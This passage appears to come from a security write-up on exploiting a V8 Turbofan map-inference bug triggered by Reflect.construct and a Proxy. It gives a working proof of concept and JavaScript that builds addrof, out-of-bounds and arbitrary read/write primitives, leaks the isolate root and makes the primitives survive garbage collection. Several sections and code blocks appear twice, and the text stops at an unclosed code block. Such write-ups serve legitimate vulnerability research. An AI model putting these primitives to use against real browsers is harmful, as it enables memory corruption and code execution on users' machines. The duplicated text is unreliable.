*maps_return = ZoneHandleSet<Map>(initial_map->object());

return result;

}

// We reached the allocation of the {receiver}.

return kNoReceiverMaps;

}

//result = kUnreliableReceiverMaps;

// ^ applied patch: JSCreate can have a side-effect.

break;

}

...

In this function, we can focus on the switch statement nested in a while loop that
traverses the effect chain. Each case handles a node opcode relevant for map inference;
the one we care about is IrOpcode::kJSCreate, which is generated for the invocation of
Reflect.construct. Eventually, the while loop will run out of nodes to check without
finding an effect node whose map matches the receiver's, since the receiver map was
changed via the Proxy handler invoked by Reflect.construct. However, the function will
still return kReliableReceiverMaps even though the receiver's map is not reliable.

The patch applied to this function is shown commented out, highlighting where the
vulnerability resides. The invocation of Reflect.construct can in fact change the map of
the receiver node, in this case the JSArray a. However, due to a logic error,
NodeProperties::InferReceiverMapsUnsafe fails to downgrade the result to
kUnreliableReceiverMaps, which would denote that the receiver maps may have changed.
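The effect of the missing assignment can be sketched with a small toy model. This is not V8 code: the node shapes, the "Witness" opcode and the `patched` switch are assumptions made purely for illustration, and the chain is assumed to contain a node further up that still records the receiver's old map.

```javascript
// Toy model only: node shapes and names are illustrative, not V8 APIs.
const Result = Object.freeze({
  NONE: "kNoReceiverMaps",
  RELIABLE: "kReliableReceiverMaps",
  UNRELIABLE: "kUnreliableReceiverMaps",
});

// effectChain is ordered from the call site upwards. Each node is
// { opcode, isReceiver, map }.
function inferReceiverMaps(effectChain, patched) {
  let result = Result.RELIABLE;
  for (const node of effectChain) {
    if (node.opcode === "JSCreate") {
      if (node.isReceiver) {
        // Reached the allocation of the receiver itself.
        return node.map ? { result, map: node.map } : { result: Result.NONE };
      }
      // The fix: an unrelated JSCreate may run user code (e.g. a Proxy trap).
      if (patched) result = Result.UNRELIABLE;
    } else if (node.opcode === "Witness" && node.isReceiver) {
      // A node that records which map the receiver had at that point.
      return { result, map: node.map };
    }
  }
  return { result: Result.NONE };
}

const chain = [
  { opcode: "JSCreate", isReceiver: false }, // stands in for Reflect.construct(...)
  { opcode: "Witness", isReceiver: true, map: "double elements map" },
];

console.log(inferReceiverMaps(chain, false).result); // kReliableReceiverMaps
console.log(inferReceiverMaps(chain, true).result);  // kUnreliableReceiverMaps
```

In the unpatched run the stale map is reported as trustworthy, which is the condition the rest of the analysis builds on.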

The implications of not marking this node as unreliable become clear from the
invocation of MapInference::RelyOnMapsPreferStability by
JSCallReducer::ReduceArrayPrototypePop, shown below:

bool MapInference::RelyOnMapsPreferStability(

CompilationDependencies* dependencies, JSGraph* jsgraph, Node** effect,

Node* control, const FeedbackSource& feedback) {

CHECK(HaveMaps());

if (Safe()) return false;

if (RelyOnMapsViaStability(dependencies)) return true;

CHECK(RelyOnMapsHelper(nullptr, jsgraph, effect, control, feedback));

return false;

}

bool MapInference::RelyOnMapsHelper(CompilationDependencies* dependencies,

JSGraph* jsgraph, Node** effect,

Node* control,

const FeedbackSource& feedback) {

if (Safe()) return true;

auto is_stable = [this](Handle<Map> map) {

MapRef map_ref(broker_, map);

return map_ref.is_stable();

};

if (dependencies != nullptr &&

std::all_of(maps_.cbegin(), maps_.cend(), is_stable)) {

for (Handle<Map> map : maps_) {

dependencies->DependOnStableMap(MapRef(broker_, map));

}

SetGuarded();

return true;

} else if (feedback.IsValid()) {

InsertMapChecks(jsgraph, effect, control, feedback);

return true;

} else {

return false;

}

}

We can observe that MapInference::Safe() is called first, and if it returns true, the
function returns immediately. The implementation of this function is the following:

bool MapInference::Safe() const {
  return maps_state_ != kUnreliableNeedGuard;
}

Because the JSCreate node never caused the result to be marked as kUnreliableReceiverMaps,
this function will always return true. The assignment that derives maps_state_ from that
result is shown below:

  maps_state_ = (result == NodeProperties::kUnreliableReceiverMaps)
                    ? kUnreliableDontNeedGuard
                    : kReliableOrGuarded;

The code path that should mitigate this vulnerability is the one in which InsertMapChecks
is invoked. This function is in charge of adding a CheckMaps node before the effect nodes
that load and store the popped element of the receiver object, ensuring that the correct
map is used for these operations.
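The decision described above can be condensed into a short toy model. It is a sketch under simplifying assumptions rather than V8's implementation: the state names mirror the C++ identifiers quoted earlier, while the function names, the string return values and the "bailout" outcome are hypothetical stand-ins.

```javascript
// Toy model of the MapInference decision; not V8 code.
function initialMapsState(inferResult) {
  return inferResult === "kUnreliableReceiverMaps"
    ? "kUnreliableDontNeedGuard"
    : "kReliableOrGuarded";
}

function safe(mapsState) {
  return mapsState !== "kUnreliableNeedGuard";
}

// Returns which protection (if any) a reducer ends up with when it relies
// on the inferred maps.
function relyOnMaps(inferResult, { mapsStable, hasFeedback }) {
  let state = initialMapsState(inferResult);
  // Once the maps are actually consulted, unreliable maps require a guard.
  if (state === "kUnreliableDontNeedGuard") state = "kUnreliableNeedGuard";
  if (safe(state)) return "no guard";
  if (mapsStable) return "stability dependency";
  if (hasFeedback) return "insert CheckMaps";
  return "bailout"; // simplification of the failing CHECK in the real code
}

const opts = { mapsStable: false, hasFeedback: true };
console.log(relyOnMaps("kReliableReceiverMaps", opts));   // no guard
console.log(relyOnMaps("kUnreliableReceiverMaps", opts)); // insert CheckMaps
```

With the buggy inference result the model never reaches the branch that would insert a map check.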

We can see that if we invoke Reflect.construct outside the context of Array.prototype.pop,

a CheckMaps node is inserted, as it should for the conventional use of this function:





However, if the invocation of Reflect.construct is within Array.protoype.pop context,

this will trigger the vulnerability and Turbofan will assume that the map of the receiver

object is reliable and will not add a CheckMaps node as show below:

However, if the invocation of Reflect.construct is within Array.protoype.pop context,

this will trigger the vulnerability and Turbofan will assume that the map of the receiver

object is reliable and will not add a CheckMaps node as show below:

Exploit Strategy ─────────────────────────────────────────────────────────────────────//──

As previously mentioned, this vulnerability allows us to trivially craft addrof and
fakeobj primitives. A common technique for this scenario, in which only addrof and fakeobj
primitives are available without OOB read/write, is to craft a fake ArrayBuffer object
with an arbitrary backing pointer. However, this approach becomes difficult with V8's
pointer compression[4], enabled since version 8.0.[5]

This is because with pointer compression, tagged pointers are stored within V8's heap as
dwords, while double values are stored as qwords. This impacts our ability to create an
effective fakeobj primitive for this specific scenario.

█ If you are interested in what this exploit would look like without pointer
█ compression, here is a really nice writeup by @HawaiiFive0day.[6]

In order to exploit this vulnerability, we have to use a different approach that will

leverage the mechanics of V8's pointer compression to our advantage.

As previously mentioned, when a new indexed property of a different _elements kind_ is
stored into array a, the array will be reallocated and its elements updated to match the
new _elements kind_.

This leaves an interesting caveat that is useful for abusing element transitions when
pointer compression is enabled. If the elements of the subject array are originally of
elements kind PACKED_DOUBLE_ELEMENTS and the array transitions to PACKED_ELEMENTS, the
result is an array half the size of the original one, since PACKED_ELEMENTS are stored as
dword tagged pointers when pointer compression is enabled, in contrast to double values,
which are stored as qwords.
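The size mismatch can be made concrete with a little arithmetic. The sketch below assumes a pointer-compressed 64-bit build (4-byte tagged slots, 8-byte doubles), ignores object headers and capacity growth, and uses an arbitrary element count; the helper name is hypothetical.

```javascript
// Assumed slot sizes for a pointer-compressed 64-bit build.
const kTaggedSize = 4; // compressed tagged pointer (dword)
const kDoubleSize = 8; // unboxed double (qword)

// Payload size of an elements store, ignoring headers and spare capacity.
function elementsPayloadBytes(length, kind) {
  const slot = kind === "PACKED_DOUBLE_ELEMENTS" ? kDoubleSize : kTaggedSize;
  return length * slot;
}

const n = 63; // illustrative element count
const before = elementsPayloadBytes(n, "PACKED_DOUBLE_ELEMENTS");
const after = elementsPayloadBytes(n, "PACKED_ELEMENTS");

// Code that still believes the elements are doubles addresses slot i at
// byte offset i * 8, so an append at index n lands well past the new store.
const staleWriteOffset = n * kDoubleSize;

console.log(before, after, staleWriteOffset - after); // 504 252 252
```

The last number is how far beyond the shrunken payload a stale double-typed append would land in this simplified picture.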

Since the map inference of the array is incorrect after the array has transitioned to

PACKED_ELEMENTS and any JSArray builtin function is subject to this wrong map inference,

we can abuse this scenario to achieve OOB read/write via the use of Array.prototype.pop

and Array.prototype.push.

However, there is a more convenient avenue for exploitation documented by Exodus
Intelligence.[7] Instead of repeatedly using JSArray builtin functions such as
Array.prototype.pop and Array.prototype.push to read and write memory, a single OOB write
can be leveraged to overwrite the length field of an adjacent array in memory. This
provides an easier path to building stronger primitives moving forward. Here is a PoC for
this exploitation strategy:

let a = [,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1.1];

var b;

function empty() {}

function f(nt) {

a.push(typeof(

Reflect.construct(empty, arguments, nt)) === Proxy

? 2.2

: 2261634.000029185 //0x414141410000f4d2 -> 0xf4d2 = 31337 * 2

);

}

let p = new Proxy(Object, {

get: function() {

a[0] = {};

b = [1.2, 1.2];

return Object.prototype;

}

});

function main(o) {

return f(o);

}

%PrepareFunctionForOptimization(empty);

%PrepareFunctionForOptimization(f);

%PrepareFunctionForOptimization(main);

main(empty);

main(empty);

%OptimizeFunctionOnNextCall(main);

main(p);

console.log(b.length); // prints 31337
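The magic constant pushed by the PoC can be decoded with a pair of bit-reinterpretation helpers. The `ftoi` and `itof` definitions below are an assumed, minimal version of the helpers used throughout the following listings; the decoding itself follows the comment in the PoC, where the low dword is the Smi-encoded length.

```javascript
// Assumed helpers: reinterpret a double as a 64-bit BigInt and back.
const conv = new DataView(new ArrayBuffer(8));

function ftoi(f) {
  conv.setFloat64(0, f, true);
  return conv.getBigUint64(0, true);
}

function itof(i) {
  conv.setBigUint64(0, i, true);
  return conv.getFloat64(0, true);
}

const bits = ftoi(2261634.000029185);
const low = bits & 0xffffffffn; // dword that carries the Smi-encoded length
const high = bits >> 32n;       // filler dword

console.log(bits.toString(16)); // 414141410000f4d2
console.log(high.toString(16)); // 41414141
console.log(Number(low >> 1n)); // 31337 (a Smi stores its value shifted left by one)
```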

Achieving Relative Arbitrary Read/Write ──────────────────────────────────────────────//──

Once we have achieved OOB read/write and successfully overwritten the length of an

adjacent array, we can now read/write into adjacent memory.

From this point forward, we can set the original vulnerability aside and treat the next
sections as independent of it, as long as we can achieve OOB read/write from a JSArray
with PACKED_DOUBLE_ELEMENTS _elements kind_.

In order to read/write memory with more flexibility, we need to build a set of read/write

primitives as well as to gain the ability to retrieve the address of arbitrary objects via

an addrof primitive.

This can be done by replacing the value of the elements tagged pointer of an adjacent

double array (c) via our OOB double array (b). If we replace the value of this field we

will be able to dereference its contents while accessing the elements of c, ultimately

enabling us to read or write to tagged pointers.

In addition, an addrof primitive can be achieved by leaking the maps of adjacent

boxed/unboxed arrays, and interchanging these also in an adjacent double array.

The implementation of these primitives on top of our preliminary OOB access is shown
below:

var a = [,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1.1];

var b;

//triggering Turbofan side-effect bug leveraging OOB write to b

oob();

// adjacent OOB-accessible arrays from double array b

var c = [1.1, 1.1, 1.1]

var d = [{}, {}];

var e = new Float64Array(8)

//leaking maps of boxed/unboxed adjacent arrays

var flt_map = ftoi(b[14]) >> 32n;

var obj_map = ftoi(b[25]) >> 32n;

function addrof(obj) {

let tmp = b[14]; // accessing array c's map tagged pointer

let tmp_elm = c[0];

// overwriting only the higher dword

b[14] = itof(((obj_map << 32n) + (ftoi(tmp) & 0xffffffffn)));

c[0] = obj;

b[14] = itof(((flt_map << 32n) + (ftoi(tmp) & 0xffffffffn)));

let leak = itof(ftoi(c[0]) & 0xffffffffn);

b[14] = tmp;

c[0] = tmp_elm;

return leak;

}

function weak_read(addr) {

let tmp = b[15]; // accessing elements pointer of c

b[15] = itof((((ftoi(addr)-8n) << 32n) + (ftoi(tmp) & 0xffffffffn)));

let result = c[0];

b[15] = tmp;

return result;

}

function weak_write(addr, what) {

let tmp = b[15];

b[15] = itof((((ftoi(addr)-8n) << 32n) + (ftoi(tmp) & 0xffffffffn)));

c[0] = what;

b[15] = tmp;

return;

}
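The pointer packing performed inside weak_read and weak_write can be looked at in isolation. The sketch below works on plain BigInt values instead of live arrays; the function name, the sample values and the 8-byte elements header are assumptions for illustration, and it masks the new pointer and uses a bitwise OR where the listing above uses an addition.

```javascript
// Assumed: slot 0 of an elements store sits 8 bytes after its start
// (a map dword followed by a length dword).
const kElementsHeaderSize = 8n;

// oldQword holds two adjacent dwords: the elements pointer in the upper half
// and a neighbouring field in the lower half that must be preserved.
function packElementsPointer(oldQword, targetTagged) {
  const keepLow = oldQword & 0xffffffffn;
  const newElements = (targetTagged - kElementsHeaderSize) & 0xffffffffn;
  return (newElements << 32n) | keepLow;
}

const oldQword = 0x080c5e59080406e9n; // hypothetical [elements | neighbour] pair
const packed = packElementsPointer(oldQword, 0x08123459n);

console.log(packed.toString(16).padStart(16, "0")); // 08123451080406e9
```

Subtracting the header size means that element 0 of the redirected array lines up with the requested address.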

Achieving Unstable Arbitrary Read/Write ──────────────────────────────────────────────//──

Unfortunately, these primitives are restricted to 8 bytes per operation and to V8's tagged
pointers, hence the weak prefix: they are relative to V8's heap.

In order to circumvent this limitation, we will have to perform the following steps to

build a stronger read/write primitive:

- Leak isolate root to resolve any V8 tagged pointer to its unboxed representation.

- Overwrite the unboxed backing_store pointer of an ArrayBuffer and access it via a

DataView object, enabling us to read and write memory to unboxed addresses, with sizes

not limited to 8 bytes per operation.

In order to leak the value of isolate root, we can leverage our weak_read primitive

to leak the value of external_pointer from a typed array. To illustrate this, let's take

a look at the fields of a Uint8Array object:

d8> a = new Uint8Array(8)

0,0,0,0,0,0,0,0

d8> %DebugPrint(a)

DebugPrint: 0x3fee080c5e69: [JSTypedArray]

- map: 0x3fee082804e1 <Map(UINT8ELEMENTS)> [FastProperties]

- prototype: 0x3fee082429b9 <Object map = 0x3fee08280509>

- elements: 0x3fee080c5e59 <ByteArray[8]> [UINT8ELEMENTS]

- embedder fields: 2

- buffer: 0x3fee080c5e21 <ArrayBuffer map = 0x3fee08281189>

- byte_offset: 0

- byte_length: 8

- length: 8

- data_ptr: 0x3fee080c5e60 <-------------------------------

- base_pointer: 0x80c5e59

- external_pointer: 0x3fee00000007

- properties: 0x3fee080406e9 <FixedArray[0]> {}

- elements: 0x3fee080c5e59 <ByteArray[8]> {

0-7: 0

}

- embedder fields = {

0, aligned pointer: (nil)

0, aligned pointer: (nil)

}

0x3fee082804e1: [Map]

- type: JS_TYPED_ARRAY_TYPE

- instance size: 68

- inobject properties: 0

- elements kind: UINT8ELEMENTS

- unused property fields: 0

- enum length: invalid

- stable_map

- back pointer: 0x3fee0804030d <undefined>

- prototype_validity cell: 0x3fee081c0451 <Cell value= 1>

- instance descriptors (own) #0: 0x3fee080401b5 <DescriptorArray[0]>

- prototype: 0x3fee082429b9 <Object map = 0x3fee08280509>

- constructor: 0x3fee08242939 <JSFunction Uint8Array (sfi = 0x3fee081c65c1)>

- dependent code: 0x3fee080401ed <Other heap object (WEAK_FIXED_ARRAY_TYPE)>

- construction counter: 0

0,0,0,0,0,0,0,0

d8>

The value of data_ptr is the result of adding base_pointer and external_pointer, and
external_pointer is ultimately the value we want. If we apply a bitmask that clears the
last byte of external_pointer, we retrieve the value of isolate root, V8's heap base:

var root_isolate_addr = itof(ftoi(addrof(e)) + BigInt(5*8));

var root_isolate = itof(ftoi(weak_read(root_isolate_addr)) & ~(0xffn))

var bff = new ArrayBuffer(8)

var buf_addr = addrof(bff);

var backing_store_addr = itof(ftoi(buf_addr) + 0x14n);

function arb_read(addr, len, boxed=false) {

if (boxed && ftoi(addr) % 2n != 0) {

addr = itof(ftoi(root_isolate) | ftoi(addr) - 1n);

}

weak_write(backing_store_addr, addr);

let dataview = new DataView(bff);

let result;

if (len == 1) {

result = dataview.getUint8(0, true)

} else if (len == 2) {

result = dataview.getUint16(0, true)

} else if (len == 4) {

result = dataview.getUint32(0, true)

} else {

result = dataview.getBigUint64(0, true);

}

return result;

}

function arb_write(addr, val, len, boxed=false) {

if (boxed && ftoi(addr) % 2n != 0) {

addr = itof(ftoi(root_isolate) | ftoi(addr) - 1n);

}

weak_write(backing_store_addr, addr);

let dataview = new DataView(bff);

if (len == 1) {

dataview.setUint8(0, val, true)

} else if (len == 2) {

dataview.setUint16(0, val, true)

} else if (len == 4) {

dataview.setUint32(0, val, true)

} else {

dataview.setBigUint64(0, val, true);

}

return;

}
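The address arithmetic used in the listing above can be checked against the values from the earlier %DebugPrint dump. This is a standalone sketch on BigInt constants; the `decompress` helper name is hypothetical and simply mirrors the expression used in arb_read and arb_write.

```javascript
// Values copied from the %DebugPrint output of the Uint8Array above.
const external_pointer = 0x3fee00000007n;
const base_pointer = 0x080c5e59n;

// data_ptr is the sum of both fields.
const data_ptr = base_pointer + external_pointer;

// Clearing the low byte of external_pointer yields the heap base.
const isolate_root = external_pointer & ~0xffn;

// Turn a compressed tagged pointer into a full untagged address:
// drop the tag bit, then OR in the heap base.
function decompress(root, tagged) {
  return root | (tagged - 1n);
}

console.log(data_ptr.toString(16));     // 3fee080c5e60
console.log(isolate_root.toString(16)); // 3fee00000000
console.log(decompress(isolate_root, 0x080c5e69n).toString(16)); // 3fee080c5e68
```

The first result matches the data_ptr line of the dump, which is a quick sanity check of the relationship between the three fields.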

Achieving Stable Arbitrary Read/Write ────────────────────────────────────────────────//──

Browsers heavily rely on features such as Garbage Collection in order to autonomously free

orphan objects (objects that are not being referenced by any other object).

However, we will soon cover how this introduces reliability issues in our exploit. This

paper will not be covering V8 Garbage Collection internals extensively as it is a broad

subject, but I highly encourage reading this[8] reference of Orinoco (V8 GC) and this[9]

on V8 memory management as an initial introduction to the subject.

In summary, the V8 heap is split into generations, and objects are moved through these





generations if they survive a GC:

To showcase an example of the reliability problems introduced by the garbage collector,
let's look at Orinoco's Minor GC, also known as Scavenge, which is in charge of
garbage-collecting the Young generation. When this GC takes place, live objects are moved
from from-space to to-space within V8's Young Generation heap.

In order to illustrate this, let's run the following script:

function force_gc() {

for (var i = 0; i < 0x80000; ++i) {

var a = new ArrayBuffer();

}

}

var b;

oob();

var c = [1.1, 1.1, 1.1]

var d = [{}, {}];

%DebugPrint(b);

%DebugPrint(c);

%DebugPrint(d);

console.log("[+] Forcing GC...")

force_gc();

%DebugPrint(b);

%DebugPrint(c);

%DebugPrint(d);

Running this script produces the following output:

0x350808087859 <JSArray[1073741820]>

0x350808087889 <JSArray[3]>

0x3508080878e1 <JSArray[2]>

[+] Forcing GC...

0x3508083826e5 <JSArray[1073741820]>

0x3508083826f5 <JSArray[3]>

0x350808382705 <JSArray[2]>

As we can see, the addresses of all the objects changed after the first Scavenge GC, as
they were evacuated to the to-space region of the young generation. If objects change
location, the memory layout that our exploitation primitives are built on also changes,
and consequently our exploit primitives break.
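The change in layout can be quantified directly from the two sets of addresses printed above. The sketch below only subtracts those addresses; the object and function names are chosen for illustration.

```javascript
// JSArray addresses copied from the output above, before and after the GC.
const before = { b: 0x350808087859n, c: 0x350808087889n, d: 0x3508080878e1n };
const after = { b: 0x3508083826e5n, c: 0x3508083826f5n, d: 0x350808382705n };

// Distances between neighbouring arrays, in bytes.
function deltas(addrs) {
  return { bToC: addrs.c - addrs.b, cToD: addrs.d - addrs.c };
}

const d0 = deltas(before); // bToC = 0x30, cToD = 0x58
const d1 = deltas(after);  // bToC = 0x10, cToD = 0x10

console.log(d0.bToC.toString(16), d0.cToD.toString(16)); // 30 58
console.log(d1.bToC.toString(16), d1.cToD.toString(16)); // 10 10
```

Since the distances between the arrays differ after the move, hard-coded indices into b such as b[14] and b[15] can no longer be expected to land on the fields of c that they targeted before.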

This specifically impacts primitives built on top of OOB reads and writes, as these will
now be operating on to-space memory rather than from-space memory. We have little control
over the layout of live objects in this new memory region, and even if we did, surviving
objects will eventually be promoted to Old Space.

This is important to understand because our addrof primitive relies on OOB reads and
writes, and so do our arb_read and arb_write primitives, which are bound to our
weak_write primitive and are therefore prone to the same problem.

There are likely several ways to circumvent this problem. It is technically possible to
craft our exploitation primitives after the dedicated objects have been promoted to Old
Space. However, there is always the possibility of an Evacuation GC being triggered
during a Major GC, which causes objects in Old Space to be rearranged for the sake of
memory defragmentation.

Although Major GCs are not triggered that often, and the Old Space region has to be
fragmented for objects to be rearranged, leveraging objects in Old Space may not be a
reliable long-term solution.

Another approach is to use objects placed within the Large Object Space region, since
these objects will not be moved by the garbage collector. I first saw this technique while
reading Brendon Tiszka's awesome post[10], in which he points out that if an object's size
exceeds the constant kMaxRegularHeapObjectSize[11] (defined as 1048576), that object will
be placed in Large Object Space.

Following this premise, we can construct an addrof primitive resilient to garbage

collection:

/// constructing stable addrof

let lo_array_obj = new Array(1048577);

let elements_ptr = weak_read(itof(ftoi(addrof(lo_array_obj)) + 8n));

elements_ptr = itof(ftoi(elements_ptr) & 0xffffffffn)

let leak_array_buffer = new ArrayBuffer(0x10);

let dd = new DataView(leak_array_buffer)

let leak_array_buffer_addr = ftoi(addrof(leak_array_buffer))

let backing_store_ptr = itof(leak_array_buffer_addr + 0x14n);

elements_ptr = itof(ftoi(root_isolate) | ftoi(elements_ptr) -1n);

weak_write(backing_store_ptr, elements_ptr)

function stable_addrof(obj) {

lo_array_obj[0] = obj;

return itof(BigInt(dd.getUint32(0x8, true)));

}

To create a set of stable arbitrary read/write primitives, we have to build them without
relying on V8 objects that will be garbage collected.

To achieve this, we can overwrite the backing store of an ArrayBuffer with an arbitrary
unboxed pointer that is not held within the V8 heap.

This prevents us from targeting addresses residing within V8's heap. Ironically, a neat
way to gain read/write access to any address on the V8 heap using this technique (as
showcased by the exploit in Brendon's post) is to use our previously leaked root_isolate
as the ArrayBuffer's backing store value. This address, which denotes the V8 heap base,
won't change for the lifetime of the current process. Modifying the length of the bound
DataView object also enables using V8 compressed untagged pointers as offsets:

// constructing stable read/write for v8 heap

let heap = new ArrayBuffer(8);

let heap_accesor = new DataView(heap);

let heap_addr_backing_store = itof(ftoi(stable_addrof(heap)) + 0x14n);

let heap_accesor_length = itof(ftoi(stable_addrof(heap_accesor)) + 0x18n);

// overwriting ArrayBuffer backing store

weak_write(heap_addr_backing_store, root_isolate)

// overwriting DataView length

weak_write(heap_accesor_length, 0xffffffff);
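How such an accessor would be used can be simulated without an exploit. In the sketch below an ordinary ArrayBuffer stands in for the V8 heap so that it runs anywhere; the helper names and the sample offset are hypothetical, and the only idea carried over from the text is that a compressed tagged pointer minus its tag bit serves as an offset from the heap base.

```javascript
// Stand-in for the V8 heap: a regular buffer whose start plays the role of
// the heap base.
const fakeHeap = new ArrayBuffer(0x100);
const accessor = new DataView(fakeHeap);

// Treat a compressed tagged pointer as an offset from the heap base.
function heapRead32(view, compressedTagged) {
  return view.getUint32(compressedTagged - 1, true);
}

function heapWrite32(view, compressedTagged, value) {
  view.setUint32(compressedTagged - 1, value, true);
}

heapWrite32(accessor, 0x41, 0xdeadbeef);
console.log(heapRead32(accessor, 0x41).toString(16)); // deadbeef
```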

We will be using this technique in order to build accessors to distinct memory regions

outside of V8 heap moving forward.

Obtaining relevant leaks ─────────────────────────────────────────────────────────────//──

Now that we can read and write arbitrary memory in a stable manner, we have to locate the
specific memory regions that we will need to access in order to craft our SHELF loader.









The following diagram illustrates the pointer relationships of the different memory

regions we are interested in:

In order to illustrate this, let's run the following script:

function force_gc() {

for (var i = 0; i < 0x80000; ++i) {

var a = new ArrayBuffer();

}

}

var b;

oob();

var c = [1.1, 1.1, 1.1]

var d = [{}, {}];

%DebugPrint(b);

%DebugPrint(c);

%DebugPrint(d);

console.log("[+] Forcing GC...")

force_gc();

%DebugPrint(b);

%DebugPrint(c);

%DebugPrint(d);

If we see the output of this script, we will see the following:

0x350808087859 <JSArray[1073741820]>

0x350808087889 <JSArray[3]>

0x3508080878e1 <JSArray[2]>

[+] Forcing GC...

0x3508083826e5 <JSArray[1073741820]>

0x3508083826f5 <JSArray[3]>

0x350808382705 <JSArray[2]>

As we can notice, the addresses of all the objects have changed after the first Scavenge GC,

as they were evacuated to to-space young generation region. This entails that if objects

change in location, the memory layout that our exploitation primitives are built on top of

will also change, and consequently our exploit primitives break.

This specifically impacts primitives build on top of OOB reads and writes, as these will

be misplaced by reading to-space memory rather than from-space memory, having little

control over the layout of live objects in this new memory region, and even if we do,

remaining live objects will eventually be promoted to Old Space.

This is important to understand, because our addrof primitive relies on OOB reads and

writes, as well as our arb_read and arb_write primitives, which are bound to our

weak_write primitive that is prone to the same problem.
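
To make the effect concrete, here is a toy model of a semispace scavenge. It is not V8

code: the class ToyYoungGeneration, its slot-index "addresses" and the object names are

all made up for illustration. It only shows why an offset computed before a scavenge

stops pointing at the intended object afterwards:

```javascript
// Toy model only: a "space" is an array of slots and an "address" is a slot index.
class ToyYoungGeneration {
  constructor(size) {
    this.fromSpace = new Array(size).fill(null);
    this.toSpace = new Array(size).fill(null);
    this.top = 0;            // bump-allocation cursor
    this.addrOf = new Map(); // object name -> current slot index
  }

  allocate(name, payload) {
    const addr = this.top++;
    this.fromSpace[addr] = payload;
    this.addrOf.set(name, addr);
    return addr;
  }

  // Copy the live objects into to-space back to back, then swap the two spaces.
  scavenge(liveNames) {
    let next = 0;
    const survivors = new Map();
    for (const name of liveNames) {
      this.toSpace[next] = this.fromSpace[this.addrOf.get(name)];
      survivors.set(name, next++);
    }
    this.fromSpace.fill(null);
    [this.fromSpace, this.toSpace] = [this.toSpace, this.fromSpace];
    this.top = next;
    this.addrOf = survivors;
  }

  read(addr) {
    return this.fromSpace[addr];
  }
}

const young = new ToyYoungGeneration(8);
const oobAddr = young.allocate("oob_array", "oob");
young.allocate("temp", "garbage"); // dies before the next GC
const victimAddr = young.allocate("victim", "victim");

// Offset hard-coded by the exploit, valid for the pre-GC layout only.
const offsetBefore = victimAddr - oobAddr;

young.scavenge(["oob_array", "victim"]);

const offsetAfter = young.addrOf.get("victim") - young.addrOf.get("oob_array");
const staleRead = young.read(young.addrOf.get("oob_array") + offsetBefore);

console.log(offsetBefore, offsetAfter, staleRead); // 2 1 null
```

The dead object between the two live ones disappears during compaction, so the stale

offset now lands on an empty slot instead of the victim.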

There are likely several ways to circumvent this problem. It is technically possible

to craft our exploitation primitives after the dedicated objects are promoted to Old Space.

However, a Major GC can still trigger an evacuation, which rearranges objects in Old Space

for the sake of memory defragmentation.

Although Major GCs are not triggered that often, and the Old Space region has to be

fragmented for objects to be rearranged, leveraging objects in Old Space may not

be a reliable long-term solution.

Another approach is to use objects placed within the Large Object Space region, since these

objects will not be moved by the garbage collector. I first saw this technique while reading

Brendon Tiszka's awesome post[10], in which he points out that if an object's size exceeds the

constant kMaxRegularHeapObjectSize[11] (defined as 1048576), that object will be placed

in Large Object Space.

Following this premise, we can construct an addrof primitive resilient to garbage

collection:

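/// constructing stable addrof

// array large enough to be allocated in Large Object Space

let lo_array_obj = new Array(1048577);

// compressed pointer to the array's elements store (kept in the lower 32 bits)

let elements_ptr = weak_read(itof(ftoi(addrof(lo_array_obj)) + 8n));

elements_ptr = itof(ftoi(elements_ptr) & 0xffffffffn);

let leak_array_buffer = new ArrayBuffer(0x10);

let dd = new DataView(leak_array_buffer);

let leak_array_buffer_addr = ftoi(addrof(leak_array_buffer));

let backing_store_ptr = itof(leak_array_buffer_addr + 0x14n);

// rebase onto the heap base and clear the tag bit to get a raw 64-bit address

elements_ptr = itof(ftoi(root_isolate) | (ftoi(elements_ptr) - 1n));

// point the ArrayBuffer's backing store at the elements store

weak_write(backing_store_ptr, elements_ptr);

function stable_addrof(obj) {

    lo_array_obj[0] = obj;

    // offset 0x8 skips the 8-byte elements header and lands on slot 0

    return itof(BigInt(dd.getUint32(0x8, true)));

}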
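
As a rough sketch of the pointer arithmetic above, the snippet below turns a raw 8-byte

read into a full untagged address. The ftoi and itof helpers here are assumed

reimplementations, and root_isolate and raw_qword hold hypothetical values rather than

real leaks:

```javascript
// Assumed helpers: reinterpret a double as a 64-bit integer and back.
const scratch = new DataView(new ArrayBuffer(8));

function ftoi(f) {
  scratch.setFloat64(0, f, true);
  return scratch.getBigUint64(0, true);
}

function itof(i) {
  scratch.setBigUint64(0, i, true);
  return scratch.getFloat64(0, true);
}

// Turn a raw 8-byte read holding a tagged compressed pointer in its low half
// into a full untagged address.
function decompress(root_isolate, raw_qword) {
  const compressed = ftoi(raw_qword) & 0xffffffffn; // keep the low 32 bits
  const untagged = compressed - 1n;                  // clear the heap-object tag bit
  return itof(ftoi(root_isolate) | untagged);        // rebase onto the heap base
}

// Hypothetical values, chosen to resemble the addresses printed earlier.
const root_isolate = itof(0x350800000000n);
const raw_qword = itof(0x0000000608382711n);

const full = decompress(root_isolate, raw_qword);
console.log("0x" + ftoi(full).toString(16)); // 0x350808382710
```

The explicit parentheses around the subtraction only document the evaluation order: in

JavaScript the binary minus already binds tighter than the bitwise OR.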

In order to create a set of stable arbitrary read/write primitives, we have to build

these primitives without relying on V8 objects that the garbage collector can move.

To achieve this, we can overwrite the backing store of an ArrayBuffer with

an arbitrary unboxed pointer that is not held within the V8 heap.

At first glance, this keeps us from targeting addresses residing within V8's heap.

Ironically, a neat way to gain read/write access to any address on the V8 heap using this

technique (as showcased by the exploit in Brendon's post) is to use our previously leaked

root_isolate as the ArrayBuffer's backing store value. This address, which denotes the V8

heap base, won't change for the lifetime of the current process. Enlarging the length of

the bound DataView object then lets us use untagged V8 compressed pointers

as offsets:

// constructing stable read/write for v8 heap

let heap = new ArrayBuffer(8);

let heap_accesor = new DataView(heap);

let heap_addr_backing_store = itof(ftoi(stable_addrof(heap)) + 0x14n);

let heap_accesor_length = itof(ftoi(stable_addrof(heap_accesor)) + 0x18n);

// overwriting ArrayBuffer backing store

weak_write(heap_addr_backing_store, root_isolate)

// overwriting DataView length

weak_write(heap_accesor_length, 0xffffffff);

We will be using this technique in order to build accessors to distinct memory regions

outside of V8 heap moving forward.
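
The idea of using compressed pointers as DataView offsets can be sketched outside of an

exploit. Here a small ArrayBuffer stands in for the region starting at root_isolate;

fake_heap, heap_read32 and heap_write32 are hypothetical names, and the planted values

are arbitrary:

```javascript
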